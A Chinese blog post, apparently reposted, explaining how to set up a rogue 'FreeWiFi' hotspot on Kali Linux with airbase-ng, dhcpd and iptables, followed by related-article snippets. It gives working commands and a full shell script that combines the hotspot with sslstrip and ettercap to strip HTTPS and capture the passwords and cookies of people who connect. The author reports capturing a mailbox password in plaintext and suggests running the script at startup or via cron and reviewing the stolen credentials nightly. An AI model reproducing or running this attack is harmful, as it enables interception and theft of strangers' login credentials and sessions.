Kali-Linux下创建一个钓鱼WiFi热点

kali-linux下用 HostAPd+bridge-utils 搭建网桥的方式来创建wifi热点的日志,有兴趣可以在看下不同:
Kali-linux下使用HostAPd创建wifi热点(AP)
这里再介绍一种方法,是使用 airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie!
所需要的软件如下;kali-linux都已经自带了,其他的系统可以自行安装:
Aircrack-ng 套件    #用来发送数据
isc-dhcp-server    #简单的dhcp服务器
sslstrip      #突破ssl加密
ettercap      #嗅探劫持
leaf /etc/dhcp/dhcpd.conf   编辑dhcp服务器配置文件,修改如下:


authoritative;

default-lease-time 700;max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {option routers 10.0.0.1;option subnet-mask 255.255.255.0;

option domain-name "FreeWiFi";option domain-name-servers 10.0.0.1;

range 10.0.0.10 10.0.0.100;

}

然后激活网卡至监听模式:
airmon-ng start wlan0
airbase-ng -e FreeWiFi -c 6 mon0
此时虚拟wifi的信号已经发送出去了,如果出现错误:
Error: Got channel -1, expected a value > 0.
执行如下命令:


airmon-ng stop mon0

ifconfig wlan0 downiwconfig wlan0 mode monitorifconfig wlan0 up

然后从激活网卡至监听模式那里重新开始。
接着执行如下命令:


ifconfig at0 upifconfig at0 10.0.0.1 netmask 255.255.255.0ifconfig at0 mtu 1400route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainecho 1 > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1iptables -P FORWARD ACCEPTiptables --append FORWARD --in-interface at0 -j ACCEPTiptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADEiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0/etc/init.d/isc-dhcp-server start

虚拟WiFir热点创建成功,接下来就是嗅探欺骗钓鱼了:


sslstrip -fpk 10000ettercap -Tpuqi at0

然后就等着鱼儿上钩吧!
手机上测试了下,网易邮箱直接明文密码:

百度使用了加密:

写了一个脚本,修改成自己的设置每次执行就ok了:
复制下面代码,保存为 “Fake_a_ap.sh”,然后 chmod +x Fake_a_ap.sh && ./Fake_a_ap.sh


#!/bin/sh

echo "即将创建WiFi热点,请确保dhcpd.conf已经配置好!" &sleep 5

ifconfig wlan0 down           #wlan0修改成你的网卡iwconfig wlan0 mode monitorifconfig wlan0 up

airmon-ng start wlan0 &sleep 5                  airbase-ng -e FreeWiFi -c 6 mon0 &             #修改成自己的热点名称和信道sleep 5

ifconfig at0 upifconfig at0 10.0.0.1 netmask 255.255.255.0ifconfig at0 mtu 1400route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1iptables --flush && iptables --table nat --flush && iptables --table nat --flush && iptables --table nat --delete-chain &

echo 1 > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1iptables -P FORWARD ACCEPTiptables --append FORWARD --in-interface at0 -j ACCEPTiptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADEiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0sleep 2/etc/init.d/isc-dhcp-server start &sleep 5sslstrip -fpk 10000 &ettercap -puTqi at0

当然还可以更加淫荡!简单修改下这个脚本的ettercap的参数:设置成将数据包保存到本地,然后再把这个脚本添加到“启动应用程序”里或者添加一个Cron任务,让它随系统启动,,,然后就没有然后了:每天睡觉前打开数据包检查下里面的username,passwd,cookie,,etc,,,,

本文转自http://xiao106347.blog.163.com/blog/static/215992078201463597381/

时间: 2024-10-12 16:28:15

Kali-Linux下创建一个钓鱼WiFi热点的相关文章

linux下创建一个可执行脚本

1.touch hello.sh 2.vim hello.sh 键入i 插入#!/bin/sh echo hello world; 键入: esc : wq 3.chmod 700 hello.sh   解释-rwx------ (700) -- 仅仅有属主有读.写.运行权限. 4. 运行./hello.sh

linux下创建一个可运行脚本

1.touch hello.sh 2.vim hello.sh 键入i 插入#!/bin/sh echo hello world; 键入: esc : wq 3.chmod 700 hello.sh   解释-rwx------ (700) -- 只有属主有读.写.执行权限. 4. 执行./hello.sh 版权声明:本文为博主原创文章,未经博主允许不得转载.

Kali Linux下破解WIFI密码挂载usb无线网卡的方法

Kali Linux下破解WIFI密码挂载usb无线网卡的方法 时间:2014-10-12    来源:服务器之家    投稿:root 首先我要说的是,wifi密码的破解不是想象中的那么容易,目前还没有一个可以破解任意类型wifi密码的工具或者方案存在.虽然你可以在网络上找到大量的教程,教程中有大量的成功案例,但是在实际场景中成功率是极低的. 其次,免费的午餐并不都那么好吃,希望读者在自己的内网上进行测试,毕竟学习技术是第一位的.免费午餐有可能会增加你遭受钓鱼攻击的风险. 本系列文章会针对不同

小心公共wifi 之小白客带你走进黑客世界:kali linux下的无线攻击技术

本文标签: 黑客世界 wifi安全 无线攻击技术 公共wifi不安全 kali+linux 原文地址:http://whosmall.com/?post=460 我们常说公共wifi不安全,那么到底不安全在哪些地方呢?当不怀好意者和你同在一个wifi下,你的手机或者笔记本会被监听吗?除了上网被监视以外,还会产生什么不好的后果?介于小伙伴们对于wifi这一块比较感兴趣,在这篇文章里,就先为大家普及一下在公共wifi下究竟有多危险. 实验环境 一台装有kali linux的笔记本(模拟攻击者)ip地

如何在Kali Linux下编译Windows Exploit

前言 微软的Windows在企业或是个人应用领域占据着最大的市场份额,在渗透测试过程中你会经常遇到很多Windows的工作站和服务器.另一方面,大多数渗透测试人员主要使用基于Linux的发行版渗透测试系统,比如Kali Linux或者Pentoo和Backbox.因此你可能就需要有在Linux机器上快速编译Windows Exploit的能力.一款叫做"Mingw-w64"的软件可以解决这个问题. Mingw-w64 是一款用于创建Windows应用程序的开源开发环境.Mingw-w6

两种在linux下创建应用程序快捷方式的方法

两种在linux下创建应用程序快捷方式的方法: A. 在桌面上创建快捷方式 B. 在应用程序菜单中添加快捷方式 在桌面上创建快捷方式 这是最简单的一种方法,在桌面上单击鼠标右键,会有一个“创建启动器”栏.这里我以为mplayer创建快捷方式为例说明: 名称-mplayer(或者你喜欢的任何名称,这个名称会出现在快捷图标的 下方) 命令-/usr/bin/gmplayer(这个是mplayer的gui应用程序的执行文件,跟 安装路径相关,可以通过which gmplayer找到) 图标-一般应用程

实验六———分析Linux内核创建一个新进程的过程

分析Linux内核创建一个新进程的过程 攥写人:李鹏举  学号:20132201 ( *原创作品转载请注明出处*) ( 学习课程:<Linux内核分析>MOOC课程http://mooc.study.163.com/course/USTC-1000029000 ) 本周要求: 阅读理解task_struct数据结构http://codelab.shiyanlou.com/xref/linux-3.18.6/include/linux/sched.h#1235: 分析fork函数对应的内核处理过

lab6:分析Linux内核创建一个新进程的过程

李俊锋 + 原创作品转载请注明出处 + <Linux内核分析>MOOC课程http://mooc.study.163.com/course/USTC-1000029000 一.实验原理 1.进程的定义 进程是操作系统的概念,每当我们执行一个程序时,对于操作系统来讲就创建了一个进程,在这个过程中,伴随着资源的分配和释放.可以认为进程是一个程序的一次执行过程. 2.进程与程序的区别 程序时静态的,它是一些保存 在磁盘上得指令的有序集合,没有任何执行的概念. 进程是一个动态的概念,它是程序执行的过程

实验六:分析Linux内核创建一个新进程的过程

20135108 李泽源 阅读理解task_struct数据结构http://codelab.shiyanlou.com/xref/linux-3.18.6/include/linux/sched.h#1235: 分析fork函数对应的内核处理过程sys_clone,理解创建一个新进程如何创建和修改task_struct数据结构: 使用gdb跟踪分析一个fork系统调用内核处理函数sys_clone ,验证您对Linux系统创建一个新进程的理解,推荐在实验楼Linux虚拟机环境下完成实验. 特别